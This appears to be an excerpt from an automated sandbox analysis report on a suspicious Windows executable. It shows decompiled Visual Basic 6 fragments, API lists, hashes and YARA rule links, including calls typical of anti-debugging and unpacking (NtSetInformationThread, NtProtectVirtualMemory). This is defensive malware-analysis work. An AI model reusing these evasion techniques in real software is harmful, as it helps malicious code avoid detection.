                          • Opcode Fuzzy Hash: 08bba07b99495729eb8cd2fa3badf8b6076510832e11652aa3b3305f6a2ab9f1
                          • Instruction Fuzzy Hash: E4113A74900688EFCB01AFA5CC45B9DBBB5FF08745F10806AF541BA1E1C7789A45CB89
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0040BD46, Relevance: 7.6, APIs: 5, Instructions: 54COMMON
                          Download Yara Rule
                          C-Code - Quality: 64%
                          			E0040BD46(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				signed int _t34;
				short _t36;
				void* _t38;
				void* _t45;
				void* _t46;
				void* _t47;
				intOrPtr _t48;

				_t38 = __ecx;
				asm("in al, dx");
				_t48 = _t47 - 0xc;
				 *[fs:0x0] = _t48;
				L00401120();
				 *((intOrPtr*)(_t45 - 0xc)) = _t48;
				 *((intOrPtr*)(_t45 - 8)) = E004010B0;
				 *((intOrPtr*)(_t45 - 4)) = 0;
				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t45 + 8)))) + 4))( *((intOrPtr*)(_t45 + 8)), __edi, __esi, __ebx, 0x3c,  *[fs:0x0], 0x401126);
				_t34 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t45 + 8)))) + 0x58))( *((intOrPtr*)(_t45 + 8)), _t45 - 0x40);
				asm("fclex");
				 *(_t45 - 0x44) = _t34;
				if( *(_t45 - 0x44) >= 0) {
					 *(_t45 - 0x50) =  *(_t45 - 0x50) & 0x00000000;
				} else {
					_push(0x58);
					_push(0x4020d4);
					_push( *((intOrPtr*)(_t45 + 8)));
					_push( *(_t45 - 0x44));
					L004011F2();
					 *(_t45 - 0x50) = _t34;
				}
				HideCaret( *(_t45 - 0x40));
				L004011EC();
				_push(0);
				_t36 =  *0x004039FF();
				_t46 = _t45 + 1;
				asm("aam 0xa");
				 *_t36 =  *_t36 + _t36;
				 *((intOrPtr*)(_t46 - 0x17af2bbb)) =  *((intOrPtr*)(_t46 - 0x17af2bbb)) + _t38;
				 *((short*)(_t46 - 0x1c)) = _t36;
				L004011E0();
				_push(E0040BE01);
				return _t36;
			}










                          0x0040bd46
                          0x0040bd46
                          0x0040bd47
                          0x0040bd56
                          0x0040bd60
                          0x0040bd68
                          0x0040bd6b
                          0x0040bd72
                          0x0040bd81
                          0x0040bd90
                          0x0040bd93
                          0x0040bd95
                          0x0040bd9c
                          0x0040bdb5
                          0x0040bd9e
                          0x0040bd9e
                          0x0040bda0
                          0x0040bda5
                          0x0040bda8
                          0x0040bdab
                          0x0040bdb0
                          0x0040bdb0
                          0x0040bdbc
                          0x0040bdc1
                          0x0040bdcb
                          0x0040bdd3
                          0x0040bdd5
                          0x0040bdd6
                          0x0040bdd8
                          0x0040bdda
                          0x0040bde4
                          0x0040bdeb
                          0x0040bdf0
                          0x00000000

                          APIs
                          • __vbaChkstk.MSVBVM60(?,00401126), ref: 0040BD60
                          • __vbaHresultCheckObj.MSVBVM60(00000000,004010B0,004020D4,00000058), ref: 0040BDAB
                          • HideCaret.USER32(?), ref: 0040BDBC
                          • __vbaSetSystemError.MSVBVM60(?,00000000,004010B0,004020D4,00000058), ref: 0040BDC1
                          • __vbaFreeVar.MSVBVM60 ref: 0040BDEB
                          Memory Dump Source
                          • Source File: 00000000.00000002.691791002.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.691784568.0000000000400000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.691802591.000000000040D000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.691808899.000000000040F000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: __vba$CaretCheckChkstkErrorFreeHideHresultSystem
                          • String ID:
                          • API String ID: 2961917346-0
                          • Opcode ID: f6f670eefe45603b195561760b3c2ecb8247a8c7cb5670fe699c6e1e0cedb25b
                          • Instruction ID: 66d8ca1993ac17da8515e34f646b0e7e8b9bd3e58b8d3ce0fd8b4448664758be
                          • Opcode Fuzzy Hash: f6f670eefe45603b195561760b3c2ecb8247a8c7cb5670fe699c6e1e0cedb25b
                          • Instruction Fuzzy Hash: 25114934900688EFCB01AFA4CC45B9DBFB5EF08744F10806AF641BA1A1C7789A46CB89
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0040C261, Relevance: 6.0, APIs: 4, Instructions: 40COMMON
                          Download Yara Rule
                          C-Code - Quality: 60%
                          			E0040C261(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4, void* _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v24;
				signed int _v32;
				signed int _v40;
				signed int _t20;
				void* _t28;
				intOrPtr _t30;

				 *[fs:0x0] = _t30;
				L00401120();
				_v12 = _t30;
				_v8 = 0x401108;
				L004011DA();
				_t20 =  *((intOrPtr*)( *_a4 + 0x14c))(_a4, 0, __edi, __esi, __ebx, 0x14,  *[fs:0x0], 0x401126, __ecx, __ecx, _t28);
				asm("fclex");
				_v32 = _t20;
				if(_v32 >= 0) {
					_v40 = _v40 & 0x00000000;
				} else {
					_push(0x14c);
					_push(0x4020d4);
					_push(_a4);
					_push(_v32);
					L004011F2();
					_v40 = _t20;
				}
				_push(E0040C2E0);
				L004011B0();
				return _t20;
			}











                          0x0040c272
                          0x0040c27c
                          0x0040c284
                          0x0040c287
                          0x0040c294
                          0x0040c2a3
                          0x0040c2a9
                          0x0040c2ab
                          0x0040c2b2
                          0x0040c2ce
                          0x0040c2b4
                          0x0040c2b4
                          0x0040c2b9
                          0x0040c2be
                          0x0040c2c1
                          0x0040c2c4
                          0x0040c2c9
                          0x0040c2c9
                          0x0040c2d2
                          0x0040c2da
                          0x0040c2df

                          APIs
                          • __vbaChkstk.MSVBVM60(?,00401126), ref: 0040C27C
                          • __vbaStrCopy.MSVBVM60(?,?,?,?,00401126), ref: 0040C294
                          • __vbaHresultCheckObj.MSVBVM60(00000000,?,004020D4,0000014C,?,?,?,?,00401126), ref: 0040C2C4
                          • __vbaFreeStr.MSVBVM60(0040C2E0,?,?,?,?,?,?,00401126), ref: 0040C2DA
                          Memory Dump Source
                          • Source File: 00000000.00000002.691791002.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.691784568.0000000000400000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.691802591.000000000040D000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.691808899.000000000040F000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: __vba$CheckChkstkCopyFreeHresult
                          • String ID:
                          • API String ID: 3646427762-0
                          • Opcode ID: ca1f4b6d22b76954e45c4986d888b5da7bc4a0ff1b83a9dfdef00745ae885d7c
                          • Instruction ID: e6314aaefe9858c2768dfea9a20980395283ff53a00ce7bf66a0ac0bf510db14
                          • Opcode Fuzzy Hash: ca1f4b6d22b76954e45c4986d888b5da7bc4a0ff1b83a9dfdef00745ae885d7c
                          • Instruction Fuzzy Hash: 6E011A70940209EFCB04DF95C946FAE7BB4EB08754F10416AF6057A5E0C3B95A01DBA8
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Analysis Process: 2eD17GZuWs.exe PID: 2936 Parent PID: 4700 2eD17GZuWs.exeCOMMON

                          Executed Functions

                          Function 00565435, Relevance: 4.2, APIs: 1, Strings: 1, Instructions: 653COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.928073100.0000000000561000.00000040.00000001.sdmp, Offset: 00561000, based on PE: false
                          Similarity
                          • API ID: LibraryLoadMemoryProtectVirtual
                          • String ID: y
                          • API String ID: 3389902171-1128323793
                          • Opcode ID: 448fdd9280b30215ea4c871e371a027e0907eaf51071c245d2699a749c49f1f0
                          • Instruction ID: fe249b39b9de613e6a9982b7ffee02e53aa71dbabee4738e359d1799567d7c4a
                          • Opcode Fuzzy Hash: 448fdd9280b30215ea4c871e371a027e0907eaf51071c245d2699a749c49f1f0
                          • Instruction Fuzzy Hash: 98224A70680702DEEF309E24CD94BE97F92FF52360F648269ED918B2C5E3758885C712
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00565F9F, Relevance: 1.7, APIs: 1, Instructions: 162nativethreadCOMMON
                          Download Yara Rule
                          APIs
                          • NtSetInformationThread.NTDLL ref: 0056632F
                          Memory Dump Source
                          • Source File: 00000001.00000002.928073100.0000000000561000.00000040.00000001.sdmp, Offset: 00561000, based on PE: false
                          Similarity
                          • API ID: InformationThread
                          • String ID:
                          • API String ID: 4046476035-0
                          • Opcode ID: a27ac88b18a0cf68898b2539ebf2e3e7f7d6ac29fc2c2a52ec60417ad535a27f
                          • Instruction ID: 71b9179b4395b31a20eca4bd19b33f05bce20e96238a11421c0da294679136f7
                          • Opcode Fuzzy Hash: a27ac88b18a0cf68898b2539ebf2e3e7f7d6ac29fc2c2a52ec60417ad535a27f
                          • Instruction Fuzzy Hash: BD413931704746CEEB219D34C9A87E96F53BF63324FA45E3AC89287695E37488C5D601
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00566039, Relevance: 1.6, APIs: 1, Instructions: 141COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000001.00000002.928073100.0000000000561000.00000040.00000001.sdmp, Offset: 00561000, based on PE: false
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 8e5038dde8e7f07ae646b17e552c37e9d4603d57097b97616dc4954fefa9063b
                          • Instruction ID: dc14c27f647b58a1a9049e478070fb48eba87e6a3b489958b93fac69eea9a8ca
                          • Opcode Fuzzy Hash: 8e5038dde8e7f07ae646b17e552c37e9d4603d57097b97616dc4954fefa9063b
                          • Instruction Fuzzy Hash: 43415831704746CEEB219E34C9687E96F53BF63334FA85E69C94287691E37488C5D602
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00565FC1, Relevance: 1.6, APIs: 1, Instructions: 138nativethreadCOMMON
                          Download Yara Rule
                          APIs
                          • NtSetInformationThread.NTDLL ref: 0056632F
                          Memory Dump Source
                          • Source File: 00000001.00000002.928073100.0000000000561000.00000040.00000001.sdmp, Offset: 00561000, based on PE: false
                          Similarity
                          • API ID: InformationThread
                          • String ID:
                          • API String ID: 4046476035-0
                          • Opcode ID: e4f6d4936681bae7ed82004eb08427368475e654e465bac59e5dd261f05f7652
                          • Instruction ID: ad45bb8017bf94af2bc1523cf091e7bc11bdfa6497222eadc684750e69d846e9
                          • Opcode Fuzzy Hash: e4f6d4936681bae7ed82004eb08427368475e654e465bac59e5dd261f05f7652
                          • Instruction Fuzzy Hash: 6B414730704746CEEB319E34C9687E96F53BF63334FA85E29C95287691E37488C5D602
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00565FE5, Relevance: 1.6, APIs: 1, Instructions: 133nativethreadCOMMON
                          Download Yara Rule
                          APIs
                          • NtSetInformationThread.NTDLL ref: 0056632F
                          Memory Dump Source
                          • Source File: 00000001.00000002.928073100.0000000000561000.00000040.00000001.sdmp, Offset: 00561000, based on PE: false
                          Similarity
                          • API ID: InformationThread
                          • String ID:
                          • API String ID: 4046476035-0
                          • Opcode ID: d43752ed222de2f07a970f03f62b49e04636d42826f0873387e8b061e4c0ea28
                          • Instruction ID: 1184d59357a2bbf1a9353332683384e238853fbb2bf6c9186b906c709305cf6e
                          • Opcode Fuzzy Hash: d43752ed222de2f07a970f03f62b49e04636d42826f0873387e8b061e4c0ea28
                          • Instruction Fuzzy Hash: 8A413731300346CEEB319E34C9687E96F92BF63334FA85E29C952876A1E37488C5D602
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00566015, Relevance: 1.6, APIs: 1, Instructions: 126nativethreadCOMMON
                          Download Yara Rule
                          APIs
                          • NtSetInformationThread.NTDLL ref: 0056632F
                          Memory Dump Source
                          • Source File: 00000001.00000002.928073100.0000000000561000.00000040.00000001.sdmp, Offset: 00561000, based on PE: false
                          Similarity
                          • API ID: InformationThread
                          • String ID:
                          • API String ID: 4046476035-0
                          • Opcode ID: da1907745b5f16c4153e732f3ab223196740eccdc58baa17209fcf62c5369363
                          • Instruction ID: 40dea924365f377e0fe35f963b6f92c5c824a66c6ae31d2cd94a3b0f0801a464
                          • Opcode Fuzzy Hash: da1907745b5f16c4153e732f3ab223196740eccdc58baa17209fcf62c5369363
                          • Instruction Fuzzy Hash: CE313731700346CEEB315E34C9687E96F92BF63334FA85E69C852876A5E37488C5D642
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00566089, Relevance: 1.6, APIs: 1, Instructions: 115nativethreadCOMMON
                          Download Yara Rule
                          APIs
                          • NtSetInformationThread.NTDLL ref: 0056632F
                          Memory Dump Source
                          • Source File: 00000001.00000002.928073100.0000000000561000.00000040.00000001.sdmp, Offset: 00561000, based on PE: false
                          Similarity
                          • API ID: InformationThread
                          • String ID:
                          • API String ID: 4046476035-0
                          • Opcode ID: cbe42170eda2a0b31139f48023a8f778f09492e3f8f65b2cdd921b6a5eb05a79
                          • Instruction ID: 6eeb4063610cce622f334c1ac71f1853887352cbe64f5d19efbd3b321c4cc624
                          • Opcode Fuzzy Hash: cbe42170eda2a0b31139f48023a8f778f09492e3f8f65b2cdd921b6a5eb05a79
                          • Instruction Fuzzy Hash: B231F735700346CEEB255E34C8647E96F52BF23324FA95E65C85287661D37488C5DA41
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 005660D1, Relevance: 1.6, APIs: 1, Instructions: 109nativethreadCOMMON
                          Download Yara Rule
                          APIs
                          • NtSetInformationThread.NTDLL ref: 0056632F
                          Memory Dump Source
                          • Source File: 00000001.00000002.928073100.0000000000561000.00000040.00000001.sdmp, Offset: 00561000, based on PE: false
                          Similarity
                          • API ID: InformationThread
                          • String ID:
                          • API String ID: 4046476035-0
                          • Opcode ID: c93ce533108b93e81efe02108c1f0c7fa303f673b485247b83a5cfd542ac9bb5
                          • Instruction ID: fcbe0e6af071c9ecd416b0f559cb8fc3efba5d386c187b19ffe8e100d237b724
                          • Opcode Fuzzy Hash: c93ce533108b93e81efe02108c1f0c7fa303f673b485247b83a5cfd542ac9bb5
                          • Instruction Fuzzy Hash: 1A31E735700746CEEF249E34C8647E96F52BF23324FE95E65C89287661D374C8C5DA41
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00566106, Relevance: 1.6, APIs: 1, Instructions: 103nativethreadCOMMON
                          Download Yara Rule
                          APIs
                          • NtSetInformationThread.NTDLL ref: 0056632F
                          Memory Dump Source
                          • Source File: 00000001.00000002.928073100.0000000000561000.00000040.00000001.sdmp, Offset: 00561000, based on PE: false
                          Similarity
                          • API ID: InformationThread
                          • String ID:
                          • API String ID: 4046476035-0
                          • Opcode ID: 5cf53c7d16e79977f75a20c76f60ca71b611e1c225de6ef4e8165a3e437b22dd
                          • Instruction ID: 5ebc0b5211aa0069d6b41f6a41f98583d8863797435bc0f794114471da03d008
                          • Opcode Fuzzy Hash: 5cf53c7d16e79977f75a20c76f60ca71b611e1c225de6ef4e8165a3e437b22dd
                          • Instruction Fuzzy Hash: 4A31F735700746CEEB259E34C8647E97F92BF23324FE95A69C892876A1D374C8C5CA41
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 005661ED, Relevance: 1.6, APIs: 1, Instructions: 79nativethreadCOMMON
                          Download Yara Rule
                          APIs
                          • NtSetInformationThread.NTDLL ref: 0056632F
                          Memory Dump Source
                          • Source File: 00000001.00000002.928073100.0000000000561000.00000040.00000001.sdmp, Offset: 00561000, based on PE: false
                          Similarity
                          • API ID: InformationThread
                          • String ID:
                          • API String ID: 4046476035-0
                          • Opcode ID: 7d2cc9a9980ce75b53456217ff6a9159e5023449964feed892f952dc84ba6c43
                          • Instruction ID: c1c2959f734840eff40deddc8e92729b8483e77dc4d8ca6f02cf519970da6870
                          • Opcode Fuzzy Hash: 7d2cc9a9980ce75b53456217ff6a9159e5023449964feed892f952dc84ba6c43
                          • Instruction Fuzzy Hash: 4021F930700346CEEB249E34C8687D97F92BF22320FD95A59C892C76A0D374C8D5CB41
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00566239, Relevance: 1.6, APIs: 1, Instructions: 65nativethreadCOMMON
                          Download Yara Rule
                          APIs
                          • NtSetInformationThread.NTDLL ref: 0056632F
                          Memory Dump Source
                          • Source File: 00000001.00000002.928073100.0000000000561000.00000040.00000001.sdmp, Offset: 00561000, based on PE: false
                          Similarity
                          • API ID: InformationThread
                          • String ID:
                          • API String ID: 4046476035-0
                          • Opcode ID: fbafeb0e1a69d98279b6a8d12122e00519fee77eb97c5721d693cefb396c3f6e
                          • Instruction ID: 79e9cea78662681868fd216758d22793dcd90940f379180facc712564b9431d3
                          • Opcode Fuzzy Hash: fbafeb0e1a69d98279b6a8d12122e00519fee77eb97c5721d693cefb396c3f6e
                          • Instruction Fuzzy Hash: 2911E731B40389CEEB259E34C8687D9BFA2BF32324FD95A55C8918B671D370C8D4C641
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 005662C5, Relevance: 1.5, APIs: 1, Instructions: 37nativethreadCOMMON
                          Download Yara Rule
                          APIs
                          • NtSetInformationThread.NTDLL ref: 0056632F
                          Memory Dump Source
                          • Source File: 00000001.00000002.928073100.0000000000561000.00000040.00000001.sdmp, Offset: 00561000, based on PE: false
                          Similarity
                          • API ID: InformationThread
                          • String ID:
                          • API String ID: 4046476035-0
                          • Opcode ID: 2f58cb3c5456eac9d60582526df4f566d01b0efe435bd26f3126466fd99c82ce
                          • Instruction ID: 01fabb23326f457eacb11f26e4d0e19d3c0c9c74a61af6c45dde21560f15beab
                          • Opcode Fuzzy Hash: 2f58cb3c5456eac9d60582526df4f566d01b0efe435bd26f3126466fd99c82ce
                          • Instruction Fuzzy Hash: 2EF0EC22B403974DA7296E78C5743E62F27BD733247CC4A45CC81CBA64F721C8D5C205
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00565A6C, Relevance: 1.5, APIs: 1, Instructions: 14nativeCOMMON
                          Download Yara Rule
                          APIs
                          • NtProtectVirtualMemory.NTDLL(000000FF,?,?,?,?,00565609,00000040), ref: 00565A87
                          Memory Dump Source
                          • Source File: 00000001.00000002.928073100.0000000000561000.00000040.00000001.sdmp, Offset: 00561000, based on PE: false
                          Similarity
                          • API ID: MemoryProtectVirtual
                          • String ID:
                          • API String ID: 2706961497-0
                          • Opcode ID: 6778930c994b4e16628e103e67a772ae27ec30a5872c99b95d6df90db3f68d8d
                          • Instruction ID: 25e40e74b59276d6f5ce34737175f32982b68450b30fcba362293b3e3ffdab88
                          • Opcode Fuzzy Hash: 6778930c994b4e16628e103e67a772ae27ec30a5872c99b95d6df90db3f68d8d
                          • Instruction Fuzzy Hash: 11C012E06140006E65048D28CD48D2772AA86D5628B14C31CB831222CCC530DC044131
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00566325, Relevance: 1.5, APIs: 1, Instructions: 14nativethreadCOMMON
                          Download Yara Rule
                          APIs
                          • NtSetInformationThread.NTDLL ref: 0056632F
                          Memory Dump Source
                          • Source File: 00000001.00000002.928073100.0000000000561000.00000040.00000001.sdmp, Offset: 00561000, based on PE: false
                          Similarity
                          • API ID: InformationThread
                          • String ID:
                          • API String ID: 4046476035-0
                          • Opcode ID: 1b363aea7f51bcad3bb88953dae251e8b57876ea322b0870d96448b80e178b92
                          • Instruction ID: fb87de3156e398432555e8639ac280932c8d188890790ca8ba2dd7348905ba5f
                          • Opcode Fuzzy Hash: 1b363aea7f51bcad3bb88953dae251e8b57876ea322b0870d96448b80e178b92
                          • Instruction Fuzzy Hash: 29D012246503454D7F196D75C6E438A3A266CA5104798891CD882D3508EA31C4498514
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 1E189660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000001.00000002.931837199.000000001E120000.00000040.00000001.sdmp, Offset: 1E120000, based on PE: true
                          • Associated: 00000001.00000002.932449535.000000001E23B000.00000040.00000001.sdmp Download File
                          • Associated: 00000001.00000002.932458457.000000001E23F000.00000040.00000001.sdmp Download File
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: 17509934f4f06a74c83cc7e2dbe65d35605066b64ea95b3257f301bc3a23a393
                          • Instruction ID: ee3170620c0dd469ebe0dd49af6784865ae20d2b4b0c96148a69348578c1a01e
                          • Opcode Fuzzy Hash: 17509934f4f06a74c83cc7e2dbe65d35605066b64ea95b3257f301bc3a23a393
                          • Instruction Fuzzy Hash: AA90027120100802D180715A450464E000557D1741FD1C119E0026614DCA559E9977F1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 1E1896E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000001.00000002.931837199.000000001E120000.00000040.00000001.sdmp, Offset: 1E120000, based on PE: true
                          • Associated: 00000001.00000002.932449535.000000001E23B000.00000040.00000001.sdmp Download File
                          • Associated: 00000001.00000002.932458457.000000001E23F000.00000040.00000001.sdmp Download File
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: 2e538f06c1b1b91fb6b4b765f2059a07dbff04f2254440434b69833a3aa414b3
                          • Instruction ID: 0975fd729ebe574d11946c9aa7f9cbdabef7f03ea0471485720fabece5b903e1
                          • Opcode Fuzzy Hash: 2e538f06c1b1b91fb6b4b765f2059a07dbff04f2254440434b69833a3aa414b3
                          • Instruction Fuzzy Hash: 5390027120108802D110615A850474E000557D0741FD5C515E4425618D86D59CD17171
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 1E189710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000001.00000002.931837199.000000001E120000.00000040.00000001.sdmp, Offset: 1E120000, based on PE: true
                          • Associated: 00000001.00000002.932449535.000000001E23B000.00000040.00000001.sdmp Download File
                          • Associated: 00000001.00000002.932458457.000000001E23F000.00000040.00000001.sdmp Download File
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: c31932ff27cb9e28603ac48f7b29509d69d739f6aee4b55c62735c406cad94df
                          • Instruction ID: 9dc34e59320158081ac7e1b6de492732c2690f84d89b7892db5b3df301ff8c0c
                          • Opcode Fuzzy Hash: c31932ff27cb9e28603ac48f7b29509d69d739f6aee4b55c62735c406cad94df
                          • Instruction Fuzzy Hash: BD90027120100402D100659A550864A000557E0741FD1D115E5025515EC6A59CD17171
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 1E189780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000001.00000002.931837199.000000001E120000.00000040.00000001.sdmp, Offset: 1E120000, based on PE: true
                          • Associated: 00000001.00000002.932449535.000000001E23B000.00000040.00000001.sdmp Download File
                          • Associated: 00000001.00000002.932458457.000000001E23F000.00000040.00000001.sdmp Download File
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: 91c75f982548788c88154b89bbb0524b2731061c901320fd872fb1ab2d695ee6
                          • Instruction ID: 781ab3ef840abce33fb99e279a4cde03f7fcca47763c339c64a8089133702c91
                          • Opcode Fuzzy Hash: 91c75f982548788c88154b89bbb0524b2731061c901320fd872fb1ab2d695ee6
                          • Instruction Fuzzy Hash: B790026921300002D180715A550860E000557D1642FD1D519E0016518CC9559CA97371
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 1E1897A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000001.00000002.931837199.000000001E120000.00000040.00000001.sdmp, Offset: 1E120000, based on PE: true
                          • Associated: 00000001.00000002.932449535.000000001E23B000.00000040.00000001.sdmp Download File
                          • Associated: 00000001.00000002.932458457.000000001E23F000.00000040.00000001.sdmp Download File
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: 225fff9df13a5bbcd5f0589bd4eb31b284acf25feca576c9d94c646f280b4ae8
                          • Instruction ID: 93e8220a598a43c7ff9239c4b3189e2b9917aa83eb5fac8e7887a5af24210355
                          • Opcode Fuzzy Hash: 225fff9df13a5bbcd5f0589bd4eb31b284acf25feca576c9d94c646f280b4ae8
                          • Instruction Fuzzy Hash: AE90026130100003D140715A551860A4005A7E1741FD1D115E0415514CD9559C967272
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 1E189540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000001.00000002.931837199.000000001E120000.00000040.00000001.sdmp, Offset: 1E120000, based on PE: true
                          • Associated: 00000001.00000002.932449535.000000001E23B000.00000040.00000001.sdmp Download File
                          • Associated: 00000001.00000002.932458457.000000001E23F000.00000040.00000001.sdmp Download File
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: 98b60bb16a199aa79cbbf046ada44969371a7fc95aa8f30a7caa8bf3bb5ff415
                          • Instruction ID: 04341a890cdddc258a49e56ba4158cdc4a326b5a4a019538db5c9c2ec90d312b
                          • Opcode Fuzzy Hash: 98b60bb16a199aa79cbbf046ada44969371a7fc95aa8f30a7caa8bf3bb5ff415
                          • Instruction Fuzzy Hash: E9900475311000030105F55F070450F004757D57D13D1C135F1017510CD771DCF17171
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 1E1895D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000001.00000002.931837199.000000001E120000.00000040.00000001.sdmp, Offset: 1E120000, based on PE: true
                          • Associated: 00000001.00000002.932449535.000000001E23B000.00000040.00000001.sdmp Download File
                          • Associated: 00000001.00000002.932458457.000000001E23F000.00000040.00000001.sdmp Download File
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: bd1a238cee51544078e86bc10ff018ce069129d3c74cf12228c749b78daf7829
                          • Instruction ID: b93c5f3055089bee179edd3da7fb021f44022acf6212fe5fab9786b639833c26
                          • Opcode Fuzzy Hash: bd1a238cee51544078e86bc10ff018ce069129d3c74cf12228c749b78daf7829
                          • Instruction Fuzzy Hash: 939004F1303000034105715F451471F400F57F0741FD1C135F1015550DC575DCD17175
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 1E189A00, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000001.00000002.931837199.000000001E120000.00000040.00000001.sdmp, Offset: 1E120000, based on PE: true
                          • Associated: 00000001.00000002.932449535.000000001E23B000.00000040.00000001.sdmp Download File
                          • Associated: 00000001.00000002.932458457.000000001E23F000.00000040.00000001.sdmp Download File
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: d23fbb29dec2924ed2352fdb07e9a828b11108493156170f02a28c049b7df8a2
                          • Instruction ID: 8aacab2ec8aca6cc97c62514f1ae183d7de0efdb547cfa75c9534c4486b2d155
                          • Opcode Fuzzy Hash: d23fbb29dec2924ed2352fdb07e9a828b11108493156170f02a28c049b7df8a2
                          • Instruction Fuzzy Hash: 9090047130140403D100715F4D1470F000557D0743FD1C115F1175515DC775DCD175F1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 1E189A20, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000001.00000002.931837199.000000001E120000.00000040.00000001.sdmp, Offset: 1E120000, based on PE: true
                          • Associated: 00000001.00000002.932449535.000000001E23B000.00000040.00000001.sdmp Download File
                          • Associated: 00000001.00000002.932458457.000000001E23F000.00000040.00000001.sdmp Download File
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: ef563712d21d3f74006b975f2b515ee34445b521981f7ef67aebfbad5bab9150
                          • Instruction ID: 29cd318a23bd8fd618302763ecc60a5f553558986dbe1875be68c9b60ec9574f
                          • Opcode Fuzzy Hash: ef563712d21d3f74006b975f2b515ee34445b521981f7ef67aebfbad5bab9150
                          • Instruction Fuzzy Hash: 45900261601000424140716A894490A40057BE16517D1C225E0999510D85999CA576B5
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 1E189A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000001.00000002.931837199.000000001E120000.00000040.00000001.sdmp, Offset: 1E120000, based on PE: true
                          • Associated: 00000001.00000002.932449535.000000001E23B000.00000040.00000001.sdmp Download File
                          • Associated: 00000001.00000002.932458457.000000001E23F000.00000040.00000001.sdmp Download File
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: 2afbef41414147f26a5530cf0b77f51466bd4690cf5aeda61200c2a8c6f3a74d
                          • Instruction ID: 59453de3264117c43651b1725a0814319141d0e46c73ae60649de9f7bbaa6710
                          • Opcode Fuzzy Hash: 2afbef41414147f26a5530cf0b77f51466bd4690cf5aeda61200c2a8c6f3a74d
                          • Instruction Fuzzy Hash: DA90026121180042D200656A4D14B0B000557D0743FD1C219E0155514CC9559CA17571
                          Uniqueness
